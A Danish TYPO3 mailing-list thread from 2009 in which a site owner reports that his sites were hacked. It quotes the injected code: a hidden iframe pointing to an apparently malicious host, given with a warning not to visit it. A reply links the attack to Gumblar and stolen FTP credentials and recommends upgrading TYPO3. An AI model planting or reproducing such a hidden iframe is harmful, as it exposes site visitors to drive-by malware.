[TYPO3-UG Denmark] Advarsel vedr. hacking
Søren Malling
soren.malling at gmail.com
Wed Jul 22 13:26:42 CEST 2009
Hej Niels,
Det er ingen "hetz" mod dig, men jeg har set mange tilfælde, hvor
sådanne problemer også skyldes usikker omgang med FTP oplysninger. Jeg
siger ikke at det er sådan i dit tilfælde!
Fra denne side -
http://news.softpedia.com/news/Gumblar-Exploit-is-the-Most-Prevalent-Web-Threat-111701.shtml
- står flg.:
"Since this script has been found on websites running a variety of PHP
applications, it cannot be tied to a particular vulnerability.
Instead, compromised FTP credentials might be the point of entry. "
Forresten blev der fornyligt udsendt en ny version af TYPO3 med en
række fejlrettelser, måske det var på tide at opgradere til 4.2.8 :)
http://news.typo3.org/news/article/typo3-428-4112-and-4013/
Mvh.
Søren
2009/7/22 Niels Lund <nl at simplexdesign.dk>:
> Hej Søren,
> Umiddelbart ser det ud til at "kun" er index.html filen som ligger i
> mappen "typo3conf" der er blevet ramt. Det er mange forskellige
> versioner er der ramt lige fra 4.1.1 til 4.2.6
>
> Ja der er en ftp konto til alle sites.
>
> Jeg har søgt lidt på google og kan se at der også er wordpress
> hjemmesider som er blevet angrebet. Der er nogen der nævner "Gumblar
> exploit"....
>
> Mvh. Niels
>
>
> Søren Malling skrev:
>> Hej Niels,
>>
>> Hvilke versioner af TYPO3 har du brugt? Er det kun dine html filer
>> (jeg går udfra at det er HTML Templates?) der er berørt? Har du en FTP
>> konto på den server hvor "hackingen" har foregået?
>>
>> Mvh.
>>
>> Søren
>>
>> 2009/7/22 Niels Lund <nl at simplexdesign.dk>:
>>> Kære typo3 liste,
>>> Jeg har netop opdaget at mange af mine websites er blevet hacket.
>>> Følgende kode er blevet indsat i index.html filen: <iframe
>>> src="http://u19.in:8080/ts/in.cgi?pepsi108" width=125 height=125
>>> style="visibility: hidden"></iframe>
>>>
>>> Advarsel, lad være med at gå ind på webadressen! Er der nogle der har
>>> oplevet noget lignende på deres sites og hvad kan man i givet fald gøre
>>> for at forhindre den type hacking?
>>>
>>> De sites den har angrebet er både nye og ældre versioner af Typo3.
>>>
>>> Håber der er nogen der kan hjælpe hurtigst muligt.
>>>
>>> Mvh. Niels
>>> _______________________________________________
>>> TYPO3-UG-Denmark mailing list
>>> TYPO3-UG-Denmark at lists.netfielders.de
>>> http://lists.netfielders.de/cgi-bin/mailman/listinfo/typo3-ug-denmark
>>>
> _______________________________________________
> TYPO3-UG-Denmark mailing list
> TYPO3-UG-Denmark at lists.netfielders.de
> http://lists.netfielders.de/cgi-bin/mailman/listinfo/typo3-ug-denmark
>
More information about the TYPO3-UG-Denmark
mailing list